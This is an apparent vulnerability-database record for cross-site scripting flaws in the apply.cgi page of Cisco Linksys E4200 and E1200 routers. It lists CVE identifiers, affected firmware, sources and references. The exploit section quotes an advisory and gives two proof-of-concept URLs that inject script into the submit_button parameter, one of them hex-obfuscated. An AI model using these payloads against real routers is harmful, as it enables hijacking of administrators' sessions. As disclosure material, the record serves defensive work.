ID

VAR-E-201304-0093


CVE

cve_id:CVE-2013-2679

Trust: 2.9

cve_id:CVE-2013-2682

Trust: 0.8

cve_id:CVE-2013-2678

Trust: 0.8

cve_id:CVE-2013-2680

Trust: 0.5

cve_id:CVE-2013-2681

Trust: 0.5

cve_id:CVE-2013-2683

Trust: 0.5

cve_id:CVE-2013-2684

Trust: 0.5

sources: BID: 59717 // BID: 59710 // BID: 59558 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501 // EDBNET: 59594

EDB ID

38501


TITLE

Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38501

DESCRIPTION

Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities. CVE-2013-2679, CVE-93060. Remote exploit for Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 38501

AFFECTED PRODUCTS

vendor: cisco, model: linksys e4200, scope: -, version: -

Trust: 1.5

vendor: cisco, model: linksys e4200 build, scope: eq, version: 1.0.057

Trust: 0.6

vendor: cisco, model: linksys e1200 n300, scope: eq, version: /

Trust: 0.5

sources: BID: 59717 // BID: 59710 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501

EXPLOIT

source: https://www.securityfocus.com/bid/59558/info

The Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Cisco Linksys E1200 N300 running firmware 2.0.04 is vulnerable.

http://www.example.com/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27

http://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

Trust: 1.0

sources: EXPLOIT-DB: 38501

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38501

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38501

TYPE

'/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 38501

TAGS

tag:exploit

Trust: 1.0

tag:xss

Trust: 1.0

tag:local

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 122342 // PACKETSTORM: 121551

CREDITS

Carl Benedict

Trust: 0.6

sources: EXPLOIT-DB: 38501

EXTERNAL IDS

db: NVD, id: CVE-2013-2679

Trust: 2.9

db: BID, id: 59558

Trust: 1.9

db: EXPLOIT-DB, id: 38501

Trust: 1.6

db: NVD, id: CVE-2013-2682

Trust: 0.8

db: NVD, id: CVE-2013-2678

Trust: 0.8

db: EDBNET, id: 59594

Trust: 0.6

db: PACKETSTORM, id: 122342

Trust: 0.5

db: NVD, id: CVE-2013-2680

Trust: 0.5

db: NVD, id: CVE-2013-2683

Trust: 0.5

db: NVD, id: CVE-2013-2681

Trust: 0.5

db: NVD, id: CVE-2013-2684

Trust: 0.5

db: PACKETSTORM, id: 121551

Trust: 0.5

db: BID, id: 59717

Trust: 0.3

db: BID, id: 59710

Trust: 0.3

sources: BID: 59717 // BID: 59710 // BID: 59558 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501 // EDBNET: 59594

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-2679

Trust: 2.6

url:https://www.securityfocus.com/bid/59558/info

Trust: 1.0

url:http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html

Trust: 0.6

url:http://support.linksys.com/en-us/support/routers/e4200

Trust: 0.6

url:https://www.exploit-db.com/exploits/38501/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-2681

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2680

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2682

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2684

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2678

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2683

Trust: 0.5

url:http://www.cisco.com

Trust: 0.3

sources: BID: 59717 // BID: 59710 // BID: 59558 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501 // EDBNET: 59594

SOURCES

db: BID, id: 59717
db: BID, id: 59710
db: BID, id: 59558
db: PACKETSTORM, id: 122342
db: PACKETSTORM, id: 121551
db: EXPLOIT-DB, id: 38501
db: EDBNET, id: 59594

LAST UPDATE DATE

2022-07-27T09:32:53.760000+00:00


SOURCES UPDATE DATE

db: BID, id: 59717, date: 2013-05-06T00:00:00
db: BID, id: 59710, date: 2013-05-06T00:00:00
db: BID, id: 59558, date: 2013-07-10T14:22:00

SOURCES RELEASE DATE

db: BID, id: 59717, date: 2013-05-06T00:00:00
db: BID, id: 59710, date: 2013-05-06T00:00:00
db: BID, id: 59558, date: 2013-04-27T00:00:00
db: PACKETSTORM, id: 122342, date: 2013-07-10T21:52:09
db: PACKETSTORM, id: 121551, date: 2013-05-07T20:22:22
db: EXPLOIT-DB, id: 38501, date: 2013-04-27T00:00:00
db: EDBNET, id: 59594, date: 2013-04-27T00:00:00